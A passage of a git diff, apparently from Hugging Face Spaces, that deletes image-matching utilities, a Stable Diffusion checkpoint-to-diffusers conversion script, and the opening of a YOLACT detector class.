= SimpleNamespace(**self.conf) - - def __call__(self, img: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: - """Resize and preprocess an image, return image and resize scale""" - h, w = img.shape[-2:] - if self.conf.resize is not None: - img = kornia.geometry.transform.resize( - img, - self.conf.resize, - side=self.conf.side, - antialias=self.conf.antialias, - align_corners=self.conf.align_corners, - ) - scale = torch.Tensor([img.shape[-1] / w, img.shape[-2] / h]).to(img) - if self.conf.grayscale and img.shape[-3] == 3: - img = kornia.color.rgb_to_grayscale(img) - elif not self.conf.grayscale and img.shape[-3] == 1: - img = kornia.color.grayscale_to_rgb(img) - return img, scale - - -def map_tensor(input_, func: Callable): - string_classes = (str, bytes) - if isinstance(input_, string_classes): - return input_ - elif isinstance(input_, collections.Mapping): - return {k: map_tensor(sample, func) for k, sample in input_.items()} - elif isinstance(input_, collections.Sequence): - return [map_tensor(sample, func) for sample in input_] - elif isinstance(input_, torch.Tensor): - return func(input_) - else: - return input_ - - -def batch_to_device(batch: dict, device: str = "cpu", non_blocking: bool = True): - """Move batch (dict) to device""" - - def _func(tensor): - return tensor.to(device=device, non_blocking=non_blocking).detach() - - return map_tensor(batch, _func) - - -def rbd(data: dict) -> dict: - """Remove batch dimension from elements in data""" - return { - k: v[0] if isinstance(v, (torch.Tensor, np.ndarray, list)) else v - for k, v in data.items() - } - - -def read_image(path: Path, grayscale: bool = False) -> np.ndarray: - """Read an image from path as RGB or grayscale""" - if not Path(path).exists(): - raise FileNotFoundError(f"No image at path {path}.") - mode = cv2.IMREAD_GRAYSCALE if grayscale else cv2.IMREAD_COLOR - image = cv2.imread(str(path), mode) - if image is None: - raise IOError(f"Could not read image at {path}.") - if not grayscale: - image = 
image[..., ::-1] - return image - - -def numpy_image_to_torch(image: np.ndarray) -> torch.Tensor: - """Normalize the image tensor and reorder the dimensions.""" - if image.ndim == 3: - image = image.transpose((2, 0, 1)) # HxWxC to CxHxW - elif image.ndim == 2: - image = image[None] # add channel axis - else: - raise ValueError(f"Not an image: {image.shape}") - return torch.tensor(image / 255.0, dtype=torch.float) - - -def resize_image( - image: np.ndarray, - size: Union[List[int], int], - fn: str = "max", - interp: Optional[str] = "area", -) -> Tuple[np.ndarray, Tuple[float, float]]: - """Resize an image to a fixed size, or according to max or min edge; return the image and (x, y) scale.""" - h, w = image.shape[:2] - - fn = {"max": max, "min": min}[fn] - if isinstance(size, int): - scale = size / fn(h, w) - h_new, w_new = int(round(h * scale)), int(round(w * scale)) - scale = (w_new / w, h_new / h) - elif isinstance(size, (tuple, list)): - h_new, w_new = size - scale = (w_new / w, h_new / h) - else: - raise ValueError(f"Incorrect new size: {size}") - mode = { - "linear": cv2.INTER_LINEAR, - "cubic": cv2.INTER_CUBIC, - "nearest": cv2.INTER_NEAREST, - "area": cv2.INTER_AREA, - }[interp] - return cv2.resize(image, (w_new, h_new), interpolation=mode), scale - - -def load_image(path: Path, resize: Optional[int] = None, **kwargs) -> torch.Tensor: - image = read_image(path) - if resize is not None: - image, _ = resize_image(image, resize, **kwargs) - return numpy_image_to_torch(image) - - -def match_pair( - extractor, - matcher, - image0: torch.Tensor, - image1: torch.Tensor, - device: str = "cpu", - **preprocess, -): - """Match a pair of images (image0, image1) with an extractor and matcher""" - feats0 = extractor.extract(image0, **preprocess) - feats1 = extractor.extract(image1, **preprocess) - matches01 = matcher({"image0": feats0, "image1": feats1}) - data = [feats0, feats1, matches01] - # remove batch dim and move to target device - feats0, feats1, matches01 = [batch_to_device(rbd(x), device) for x in data] - return feats0, feats1, 
matches01 diff --git a/spaces/Red54/convert-sd-ckpt/convert.py b/spaces/Red54/convert-sd-ckpt/convert.py deleted file mode 100644 index b1e7841c102e3b763d13aa9b8996efd405956c6e..0000000000000000000000000000000000000000 --- a/spaces/Red54/convert-sd-ckpt/convert.py +++ /dev/null @@ -1,878 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" Conversion script for the Stable Diffusion checkpoints. """ - -import torch - -try: - from omegaconf import OmegaConf -except ImportError: - raise ImportError( - "OmegaConf is required to convert the LDM checkpoints. Please install it with `pip install OmegaConf`." - ) - -from diffusers import (AutoencoderKL, DDIMScheduler, - EulerAncestralDiscreteScheduler, EulerDiscreteScheduler, - LMSDiscreteScheduler, PNDMScheduler, - StableDiffusionPipeline, UNet2DConditionModel) -from diffusers.pipelines.latent_diffusion.pipeline_latent_diffusion import ( - LDMBertConfig, LDMBertModel) -from diffusers.pipelines.stable_diffusion import StableDiffusionSafetyChecker -from transformers import AutoFeatureExtractor, CLIPTextModel, CLIPTokenizer - - -def shave_segments(path, n_shave_prefix_segments=1): - """ - Removes segments. Positive values shave the first segments, negative shave the last segments. 
- """ - if n_shave_prefix_segments >= 0: - return ".".join(path.split(".")[n_shave_prefix_segments:]) - else: - return ".".join(path.split(".")[:n_shave_prefix_segments]) - - -def renew_resnet_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside resnets to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item.replace("in_layers.0", "norm1") - new_item = new_item.replace("in_layers.2", "conv1") - - new_item = new_item.replace("out_layers.0", "norm2") - new_item = new_item.replace("out_layers.3", "conv2") - - new_item = new_item.replace("emb_layers.1", "time_emb_proj") - new_item = new_item.replace("skip_connection", "conv_shortcut") - - new_item = shave_segments( - new_item, n_shave_prefix_segments=n_shave_prefix_segments - ) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def renew_vae_resnet_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside resnets to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item - - new_item = new_item.replace("nin_shortcut", "conv_shortcut") - new_item = shave_segments( - new_item, n_shave_prefix_segments=n_shave_prefix_segments - ) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def renew_attention_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside attentions to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item - - # new_item = new_item.replace('norm.weight', 'group_norm.weight') - # new_item = new_item.replace('norm.bias', 'group_norm.bias') - - # new_item = new_item.replace('proj_out.weight', 'proj_attn.weight') - # new_item = new_item.replace('proj_out.bias', 'proj_attn.bias') - - # new_item = shave_segments(new_item, n_shave_prefix_segments=n_shave_prefix_segments) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - 
- -def renew_vae_attention_paths(old_list, n_shave_prefix_segments=0): - """ - Updates paths inside attentions to the new naming scheme (local renaming) - """ - mapping = [] - for old_item in old_list: - new_item = old_item - - new_item = new_item.replace("norm.weight", "group_norm.weight") - new_item = new_item.replace("norm.bias", "group_norm.bias") - - new_item = new_item.replace("q.weight", "query.weight") - new_item = new_item.replace("q.bias", "query.bias") - - new_item = new_item.replace("k.weight", "key.weight") - new_item = new_item.replace("k.bias", "key.bias") - - new_item = new_item.replace("v.weight", "value.weight") - new_item = new_item.replace("v.bias", "value.bias") - - new_item = new_item.replace("proj_out.weight", "proj_attn.weight") - new_item = new_item.replace("proj_out.bias", "proj_attn.bias") - - new_item = shave_segments( - new_item, n_shave_prefix_segments=n_shave_prefix_segments - ) - - mapping.append({"old": old_item, "new": new_item}) - - return mapping - - -def assign_to_checkpoint( - paths, - checkpoint, - old_checkpoint, - attention_paths_to_split=None, - additional_replacements=None, - config=None, -): - """ - This does the final conversion step: take locally converted weights and apply a global renaming - to them. It splits attention layers, and takes into account additional replacements - that may arise. - Assigns the weights to the new checkpoint. - """ - assert isinstance( - paths, list - ), "Paths should be a list of dicts containing 'old' and 'new' keys." - - # Splits the attention layers into three variables. 
- if attention_paths_to_split is not None: - for path, path_map in attention_paths_to_split.items(): - old_tensor = old_checkpoint[path] - channels = old_tensor.shape[0] // 3 - - target_shape = (-1, channels) if len(old_tensor.shape) == 3 else (-1) - - num_heads = old_tensor.shape[0] // config["num_head_channels"] // 3 - - old_tensor = old_tensor.reshape( - (num_heads, 3 * channels // num_heads) + old_tensor.shape[1:] - ) - query, key, value = old_tensor.split(channels // num_heads, dim=1) - - checkpoint[path_map["query"]] = query.reshape(target_shape) - checkpoint[path_map["key"]] = key.reshape(target_shape) - checkpoint[path_map["value"]] = value.reshape(target_shape) - - for path in paths: - new_path = path["new"] - - # These have already been assigned - if ( - attention_paths_to_split is not None - and new_path in attention_paths_to_split - ): - continue - - # Global renaming happens here - new_path = new_path.replace("middle_block.0", "mid_block.resnets.0") - new_path = new_path.replace("middle_block.1", "mid_block.attentions.0") - new_path = new_path.replace("middle_block.2", "mid_block.resnets.1") - - if additional_replacements is not None: - for replacement in additional_replacements: - new_path = new_path.replace(replacement["old"], replacement["new"]) - - # proj_attn.weight has to be converted from conv 1D to linear - if "proj_attn.weight" in new_path: - checkpoint[new_path] = old_checkpoint[path["old"]][:, :, 0] - else: - checkpoint[new_path] = old_checkpoint[path["old"]] - - -def conv_attn_to_linear(checkpoint): - keys = list(checkpoint.keys()) - attn_keys = ["query.weight", "key.weight", "value.weight"] - for key in keys: - if ".".join(key.split(".")[-2:]) in attn_keys: - if checkpoint[key].ndim > 2: - checkpoint[key] = checkpoint[key][:, :, 0, 0] - elif "proj_attn.weight" in key: - if checkpoint[key].ndim > 2: - checkpoint[key] = checkpoint[key][:, :, 0] - - -def create_unet_diffusers_config(original_config): - """ - Creates a config for the diffusers 
based on the config of the LDM model. - """ - unet_params = original_config.model.params.unet_config.params - - block_out_channels = [ - unet_params.model_channels * mult for mult in unet_params.channel_mult - ] - - down_block_types = [] - resolution = 1 - for i in range(len(block_out_channels)): - block_type = ( - "CrossAttnDownBlock2D" - if resolution in unet_params.attention_resolutions - else "DownBlock2D" - ) - down_block_types.append(block_type) - if i != len(block_out_channels) - 1: - resolution *= 2 - - up_block_types = [] - for i in range(len(block_out_channels)): - block_type = ( - "CrossAttnUpBlock2D" - if resolution in unet_params.attention_resolutions - else "UpBlock2D" - ) - up_block_types.append(block_type) - resolution //= 2 - - config = dict( - sample_size=unet_params.image_size, - in_channels=unet_params.in_channels, - out_channels=unet_params.out_channels, - down_block_types=tuple(down_block_types), - up_block_types=tuple(up_block_types), - block_out_channels=tuple(block_out_channels), - layers_per_block=unet_params.num_res_blocks, - cross_attention_dim=unet_params.context_dim, - attention_head_dim=unet_params.num_heads, - ) - - return config - - -def create_vae_diffusers_config(original_config): - """ - Creates a config for the diffusers based on the config of the LDM model. 
- """ - vae_params = original_config.model.params.first_stage_config.params.ddconfig - _ = original_config.model.params.first_stage_config.params.embed_dim - - block_out_channels = [vae_params.ch * mult for mult in vae_params.ch_mult] - down_block_types = ["DownEncoderBlock2D"] * len(block_out_channels) - up_block_types = ["UpDecoderBlock2D"] * len(block_out_channels) - - config = dict( - sample_size=vae_params.resolution, - in_channels=vae_params.in_channels, - out_channels=vae_params.out_ch, - down_block_types=tuple(down_block_types), - up_block_types=tuple(up_block_types), - block_out_channels=tuple(block_out_channels), - latent_channels=vae_params.z_channels, - layers_per_block=vae_params.num_res_blocks, - ) - return config - - -def create_diffusers_schedular(original_config): - schedular = DDIMScheduler( - num_train_timesteps=original_config.model.params.timesteps, - beta_start=original_config.model.params.linear_start, - beta_end=original_config.model.params.linear_end, - beta_schedule="scaled_linear", - ) - return schedular - - -def create_ldm_bert_config(original_config): - bert_params = original_config.model.parms.cond_stage_config.params - config = LDMBertConfig( - d_model=bert_params.n_embed, - encoder_layers=bert_params.n_layer, - encoder_ffn_dim=bert_params.n_embed * 4, - ) - return config - - -def convert_ldm_unet_checkpoint(checkpoint, config, extract_ema=False): - """ - Takes a state dict and a config, and returns a converted checkpoint. - """ - - # extract state_dict for UNet - unet_state_dict = {} - keys = list(checkpoint.keys()) - - unet_key = "model.diffusion_model." - # at least a 100 parameters have to start with `model_ema` in order for the checkpoint to be EMA - if sum(k.startswith("model_ema") for k in keys) > 100: - print(f"Checkpoint has both EMA and non-EMA weights.") - if extract_ema: - print( - "In this conversion only the EMA weights are extracted. 
If you want to instead extract the non-EMA" - " weights (useful to continue fine-tuning), please make sure to remove the `--extract_ema` flag." - ) - for key in keys: - if key.startswith("model.diffusion_model"): - flat_ema_key = "model_ema." + "".join(key.split(".")[1:]) - unet_state_dict[key.replace(unet_key, "")] = checkpoint.pop( - flat_ema_key - ) - else: - print( - "In this conversion only the non-EMA weights are extracted. If you want to instead extract the EMA" - " weights (usually better for inference), please make sure to add the `--extract_ema` flag." - ) - - for key in keys: - if key.startswith(unet_key): - unet_state_dict[key.replace(unet_key, "")] = checkpoint.pop(key) - - new_checkpoint = {} - - new_checkpoint["time_embedding.linear_1.weight"] = unet_state_dict[ - "time_embed.0.weight" - ] - new_checkpoint["time_embedding.linear_1.bias"] = unet_state_dict[ - "time_embed.0.bias" - ] - new_checkpoint["time_embedding.linear_2.weight"] = unet_state_dict[ - "time_embed.2.weight" - ] - new_checkpoint["time_embedding.linear_2.bias"] = unet_state_dict[ - "time_embed.2.bias" - ] - - new_checkpoint["conv_in.weight"] = unet_state_dict["input_blocks.0.0.weight"] - new_checkpoint["conv_in.bias"] = unet_state_dict["input_blocks.0.0.bias"] - - new_checkpoint["conv_norm_out.weight"] = unet_state_dict["out.0.weight"] - new_checkpoint["conv_norm_out.bias"] = unet_state_dict["out.0.bias"] - new_checkpoint["conv_out.weight"] = unet_state_dict["out.2.weight"] - new_checkpoint["conv_out.bias"] = unet_state_dict["out.2.bias"] - - # Retrieves the keys for the input blocks only - num_input_blocks = len( - { - ".".join(layer.split(".")[:2]) - for layer in unet_state_dict - if "input_blocks" in layer - } - ) - input_blocks = { - layer_id: [key for key in unet_state_dict if f"input_blocks.{layer_id}" in key] - for layer_id in range(num_input_blocks) - } - - # Retrieves the keys for the middle blocks only - num_middle_blocks = len( - { - ".".join(layer.split(".")[:2]) - for 
layer in unet_state_dict - if "middle_block" in layer - } - ) - middle_blocks = { - layer_id: [key for key in unet_state_dict if f"middle_block.{layer_id}" in key] - for layer_id in range(num_middle_blocks) - } - - # Retrieves the keys for the output blocks only - num_output_blocks = len( - { - ".".join(layer.split(".")[:2]) - for layer in unet_state_dict - if "output_blocks" in layer - } - ) - output_blocks = { - layer_id: [key for key in unet_state_dict if f"output_blocks.{layer_id}" in key] - for layer_id in range(num_output_blocks) - } - - for i in range(1, num_input_blocks): - block_id = (i - 1) // (config["layers_per_block"] + 1) - layer_in_block_id = (i - 1) % (config["layers_per_block"] + 1) - - resnets = [ - key - for key in input_blocks[i] - if f"input_blocks.{i}.0" in key and f"input_blocks.{i}.0.op" not in key - ] - attentions = [key for key in input_blocks[i] if f"input_blocks.{i}.1" in key] - - if f"input_blocks.{i}.0.op.weight" in unet_state_dict: - new_checkpoint[ - f"down_blocks.{block_id}.downsamplers.0.conv.weight" - ] = unet_state_dict.pop(f"input_blocks.{i}.0.op.weight") - new_checkpoint[ - f"down_blocks.{block_id}.downsamplers.0.conv.bias" - ] = unet_state_dict.pop(f"input_blocks.{i}.0.op.bias") - - paths = renew_resnet_paths(resnets) - meta_path = { - "old": f"input_blocks.{i}.0", - "new": f"down_blocks.{block_id}.resnets.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - if len(attentions): - paths = renew_attention_paths(attentions) - meta_path = { - "old": f"input_blocks.{i}.1", - "new": f"down_blocks.{block_id}.attentions.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - resnet_0 = middle_blocks[0] - attentions = middle_blocks[1] - resnet_1 = middle_blocks[2] - - resnet_0_paths = renew_resnet_paths(resnet_0) - 
assign_to_checkpoint(resnet_0_paths, new_checkpoint, unet_state_dict, config=config) - - resnet_1_paths = renew_resnet_paths(resnet_1) - assign_to_checkpoint(resnet_1_paths, new_checkpoint, unet_state_dict, config=config) - - attentions_paths = renew_attention_paths(attentions) - meta_path = {"old": "middle_block.1", "new": "mid_block.attentions.0"} - assign_to_checkpoint( - attentions_paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - for i in range(num_output_blocks): - block_id = i // (config["layers_per_block"] + 1) - layer_in_block_id = i % (config["layers_per_block"] + 1) - output_block_layers = [shave_segments(name, 2) for name in output_blocks[i]] - output_block_list = {} - - for layer in output_block_layers: - layer_id, layer_name = layer.split(".")[0], shave_segments(layer, 1) - if layer_id in output_block_list: - output_block_list[layer_id].append(layer_name) - else: - output_block_list[layer_id] = [layer_name] - - if len(output_block_list) > 1: - resnets = [key for key in output_blocks[i] if f"output_blocks.{i}.0" in key] - attentions = [ - key for key in output_blocks[i] if f"output_blocks.{i}.1" in key - ] - - resnet_0_paths = renew_resnet_paths(resnets) - paths = renew_resnet_paths(resnets) - - meta_path = { - "old": f"output_blocks.{i}.0", - "new": f"up_blocks.{block_id}.resnets.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - if ["conv.weight", "conv.bias"] in output_block_list.values(): - index = list(output_block_list.values()).index( - ["conv.weight", "conv.bias"] - ) - new_checkpoint[ - f"up_blocks.{block_id}.upsamplers.0.conv.weight" - ] = unet_state_dict[f"output_blocks.{i}.{index}.conv.weight"] - new_checkpoint[ - f"up_blocks.{block_id}.upsamplers.0.conv.bias" - ] = unet_state_dict[f"output_blocks.{i}.{index}.conv.bias"] - - # Clear attentions as they have been attributed 
above. - if len(attentions) == 2: - attentions = [] - - if len(attentions): - paths = renew_attention_paths(attentions) - meta_path = { - "old": f"output_blocks.{i}.1", - "new": f"up_blocks.{block_id}.attentions.{layer_in_block_id}", - } - assign_to_checkpoint( - paths, - new_checkpoint, - unet_state_dict, - additional_replacements=[meta_path], - config=config, - ) - else: - resnet_0_paths = renew_resnet_paths( - output_block_layers, n_shave_prefix_segments=1 - ) - for path in resnet_0_paths: - old_path = ".".join(["output_blocks", str(i), path["old"]]) - new_path = ".".join( - [ - "up_blocks", - str(block_id), - "resnets", - str(layer_in_block_id), - path["new"], - ] - ) - - new_checkpoint[new_path] = unet_state_dict[old_path] - - return new_checkpoint - - -def convert_ldm_vae_checkpoint(checkpoint, config): - # extract state dict for VAE - vae_state_dict = {} - vae_key = "first_stage_model." - keys = list(checkpoint.keys()) - for key in keys: - if key.startswith(vae_key): - vae_state_dict[key.replace(vae_key, "")] = checkpoint.get(key) - - new_checkpoint = {} - - new_checkpoint["encoder.conv_in.weight"] = vae_state_dict["encoder.conv_in.weight"] - new_checkpoint["encoder.conv_in.bias"] = vae_state_dict["encoder.conv_in.bias"] - new_checkpoint["encoder.conv_out.weight"] = vae_state_dict[ - "encoder.conv_out.weight" - ] - new_checkpoint["encoder.conv_out.bias"] = vae_state_dict["encoder.conv_out.bias"] - new_checkpoint["encoder.conv_norm_out.weight"] = vae_state_dict[ - "encoder.norm_out.weight" - ] - new_checkpoint["encoder.conv_norm_out.bias"] = vae_state_dict[ - "encoder.norm_out.bias" - ] - - new_checkpoint["decoder.conv_in.weight"] = vae_state_dict["decoder.conv_in.weight"] - new_checkpoint["decoder.conv_in.bias"] = vae_state_dict["decoder.conv_in.bias"] - new_checkpoint["decoder.conv_out.weight"] = vae_state_dict[ - "decoder.conv_out.weight" - ] - new_checkpoint["decoder.conv_out.bias"] = vae_state_dict["decoder.conv_out.bias"] - 
new_checkpoint["decoder.conv_norm_out.weight"] = vae_state_dict[ - "decoder.norm_out.weight" - ] - new_checkpoint["decoder.conv_norm_out.bias"] = vae_state_dict[ - "decoder.norm_out.bias" - ] - - new_checkpoint["quant_conv.weight"] = vae_state_dict["quant_conv.weight"] - new_checkpoint["quant_conv.bias"] = vae_state_dict["quant_conv.bias"] - new_checkpoint["post_quant_conv.weight"] = vae_state_dict["post_quant_conv.weight"] - new_checkpoint["post_quant_conv.bias"] = vae_state_dict["post_quant_conv.bias"] - - # Retrieves the keys for the encoder down blocks only - num_down_blocks = len( - { - ".".join(layer.split(".")[:3]) - for layer in vae_state_dict - if "encoder.down" in layer - } - ) - down_blocks = { - layer_id: [key for key in vae_state_dict if f"down.{layer_id}" in key] - for layer_id in range(num_down_blocks) - } - - # Retrieves the keys for the decoder up blocks only - num_up_blocks = len( - { - ".".join(layer.split(".")[:3]) - for layer in vae_state_dict - if "decoder.up" in layer - } - ) - up_blocks = { - layer_id: [key for key in vae_state_dict if f"up.{layer_id}" in key] - for layer_id in range(num_up_blocks) - } - - for i in range(num_down_blocks): - resnets = [ - key - for key in down_blocks[i] - if f"down.{i}" in key and f"down.{i}.downsample" not in key - ] - - if f"encoder.down.{i}.downsample.conv.weight" in vae_state_dict: - new_checkpoint[ - f"encoder.down_blocks.{i}.downsamplers.0.conv.weight" - ] = vae_state_dict.pop(f"encoder.down.{i}.downsample.conv.weight") - new_checkpoint[ - f"encoder.down_blocks.{i}.downsamplers.0.conv.bias" - ] = vae_state_dict.pop(f"encoder.down.{i}.downsample.conv.bias") - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"down.{i}.block", "new": f"down_blocks.{i}.resnets"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_resnets = [key for key in vae_state_dict if "encoder.mid.block" in key] - num_mid_res_blocks = 2 
- for i in range(1, num_mid_res_blocks + 1): - resnets = [key for key in mid_resnets if f"encoder.mid.block_{i}" in key] - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"mid.block_{i}", "new": f"mid_block.resnets.{i - 1}"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_attentions = [key for key in vae_state_dict if "encoder.mid.attn" in key] - paths = renew_vae_attention_paths(mid_attentions) - meta_path = {"old": "mid.attn_1", "new": "mid_block.attentions.0"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - conv_attn_to_linear(new_checkpoint) - - for i in range(num_up_blocks): - block_id = num_up_blocks - 1 - i - resnets = [ - key - for key in up_blocks[block_id] - if f"up.{block_id}" in key and f"up.{block_id}.upsample" not in key - ] - - if f"decoder.up.{block_id}.upsample.conv.weight" in vae_state_dict: - new_checkpoint[ - f"decoder.up_blocks.{i}.upsamplers.0.conv.weight" - ] = vae_state_dict[f"decoder.up.{block_id}.upsample.conv.weight"] - new_checkpoint[ - f"decoder.up_blocks.{i}.upsamplers.0.conv.bias" - ] = vae_state_dict[f"decoder.up.{block_id}.upsample.conv.bias"] - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"up.{block_id}.block", "new": f"up_blocks.{i}.resnets"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - - mid_resnets = [key for key in vae_state_dict if "decoder.mid.block" in key] - num_mid_res_blocks = 2 - for i in range(1, num_mid_res_blocks + 1): - resnets = [key for key in mid_resnets if f"decoder.mid.block_{i}" in key] - - paths = renew_vae_resnet_paths(resnets) - meta_path = {"old": f"mid.block_{i}", "new": f"mid_block.resnets.{i - 1}"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - 
config=config, - ) - - mid_attentions = [key for key in vae_state_dict if "decoder.mid.attn" in key] - paths = renew_vae_attention_paths(mid_attentions) - meta_path = {"old": "mid.attn_1", "new": "mid_block.attentions.0"} - assign_to_checkpoint( - paths, - new_checkpoint, - vae_state_dict, - additional_replacements=[meta_path], - config=config, - ) - conv_attn_to_linear(new_checkpoint) - return new_checkpoint - - -def convert_ldm_bert_checkpoint(checkpoint, config): - def _copy_attn_layer(hf_attn_layer, pt_attn_layer): - hf_attn_layer.q_proj.weight.data = pt_attn_layer.to_q.weight - hf_attn_layer.k_proj.weight.data = pt_attn_layer.to_k.weight - hf_attn_layer.v_proj.weight.data = pt_attn_layer.to_v.weight - - hf_attn_layer.out_proj.weight = pt_attn_layer.to_out.weight - hf_attn_layer.out_proj.bias = pt_attn_layer.to_out.bias - - def _copy_linear(hf_linear, pt_linear): - hf_linear.weight = pt_linear.weight - hf_linear.bias = pt_linear.bias - - def _copy_layer(hf_layer, pt_layer): - # copy layer norms - _copy_linear(hf_layer.self_attn_layer_norm, pt_layer[0][0]) - _copy_linear(hf_layer.final_layer_norm, pt_layer[1][0]) - - # copy attn - _copy_attn_layer(hf_layer.self_attn, pt_layer[0][1]) - - # copy MLP - pt_mlp = pt_layer[1][1] - _copy_linear(hf_layer.fc1, pt_mlp.net[0][0]) - _copy_linear(hf_layer.fc2, pt_mlp.net[2]) - - def _copy_layers(hf_layers, pt_layers): - for i, hf_layer in enumerate(hf_layers): - if i != 0: - i += i - pt_layer = pt_layers[i : i + 2] - _copy_layer(hf_layer, pt_layer) - - hf_model = LDMBertModel(config).eval() - - # copy embeds - hf_model.model.embed_tokens.weight = checkpoint.transformer.token_emb.weight - hf_model.model.embed_positions.weight.data = ( - checkpoint.transformer.pos_emb.emb.weight - ) - - # copy layer norm - _copy_linear(hf_model.model.layer_norm, checkpoint.transformer.norm) - - # copy hidden layers - _copy_layers(hf_model.model.layers, checkpoint.transformer.attn_layers.layers) - - _copy_linear(hf_model.to_logits, 
checkpoint.transformer.to_logits) - - return hf_model - - -def convert_ldm_clip_checkpoint(checkpoint): - text_model = CLIPTextModel.from_pretrained("openai/clip-vit-large-patch14") - - keys = list(checkpoint.keys()) - - text_model_dict = {} - - for key in keys: - if key.startswith("cond_stage_model.transformer"): - text_model_dict[key[len("cond_stage_model.transformer.") :]] = checkpoint[ - key - ] - - text_model.load_state_dict(text_model_dict) - - return text_model - - -def convert_full_checkpoint( - checkpoint_path: str, config_file, scheduler_type, extract_ema, output_path=None -): - original_config = OmegaConf.load(config_file) - checkpoint = torch.load(checkpoint_path, weights_only=False) - checkpoint = checkpoint["state_dict"] - - num_train_timesteps = original_config.model.params.timesteps - beta_start = original_config.model.params.linear_start - beta_end = original_config.model.params.linear_end - if scheduler_type == "PNDM": - scheduler = PNDMScheduler( - beta_end=beta_end, - beta_schedule="scaled_linear", - beta_start=beta_start, - num_train_timesteps=num_train_timesteps, - skip_prk_steps=True, - ) - elif scheduler_type == "K-LMS": - scheduler = LMSDiscreteScheduler( - beta_start=beta_start, beta_end=beta_end, beta_schedule="scaled_linear" - ) - elif scheduler_type == "Euler": - scheduler = EulerDiscreteScheduler( - beta_start=beta_start, beta_end=beta_end, beta_schedule="scaled_linear" - ) - elif scheduler_type == "EulerAncestral": - scheduler = EulerAncestralDiscreteScheduler( - beta_start=beta_start, beta_end=beta_end, beta_schedule="scaled_linear" - ) - elif scheduler_type == "DDIM": - scheduler = DDIMScheduler( - beta_start=beta_start, - beta_end=beta_end, - beta_schedule="scaled_linear", - clip_sample=False, - set_alpha_to_one=False, - ) - else: - raise ValueError(f"Scheduler of type {scheduler_type} doesn't exist!") - - # Convert the UNet2DConditionModel model. 
- unet_config = create_unet_diffusers_config(original_config) - converted_unet_checkpoint = convert_ldm_unet_checkpoint( - checkpoint, unet_config, extract_ema=extract_ema - ) - - # Convert the VAE model. - vae_config = create_vae_diffusers_config(original_config) - converted_vae_checkpoint = convert_ldm_vae_checkpoint(checkpoint, vae_config) - - # Convert the text model. - text_model = convert_ldm_clip_checkpoint(checkpoint) - - del checkpoint - - unet = UNet2DConditionModel(**unet_config) - unet.load_state_dict(converted_unet_checkpoint) - del converted_unet_checkpoint - - vae = AutoencoderKL(**vae_config) - vae.load_state_dict(converted_vae_checkpoint) - del converted_vae_checkpoint - - tokenizer = CLIPTokenizer.from_pretrained("openai/clip-vit-large-patch14") - safety_checker = StableDiffusionSafetyChecker.from_pretrained( - "CompVis/stable-diffusion-safety-checker", device_map="auto" - ) - feature_extractor = AutoFeatureExtractor.from_pretrained( - "CompVis/stable-diffusion-safety-checker" - ) - pipe = StableDiffusionPipeline( - vae=vae, - text_encoder=text_model, - tokenizer=tokenizer, - unet=unet, - scheduler=scheduler, - safety_checker=safety_checker, - feature_extractor=feature_extractor, - ) - - pipe.save_pretrained(output_path) diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet_null/models/detectors/yolact.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet_null/models/detectors/yolact.py deleted file mode 100644 index f32fde0d3dcbb55a405e05df433c4353938a148b..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet_null/models/detectors/yolact.py +++ /dev/null @@ -1,146 +0,0 @@ -import torch - -from mmdet.core import bbox2result -from ..builder import DETECTORS, build_head -from .single_stage import SingleStageDetector - - -@DETECTORS.register_module() -class YOLACT(SingleStageDetector): - """Implementation of `YOLACT `_""" - - def __init__(self, - backbone, - neck, - 
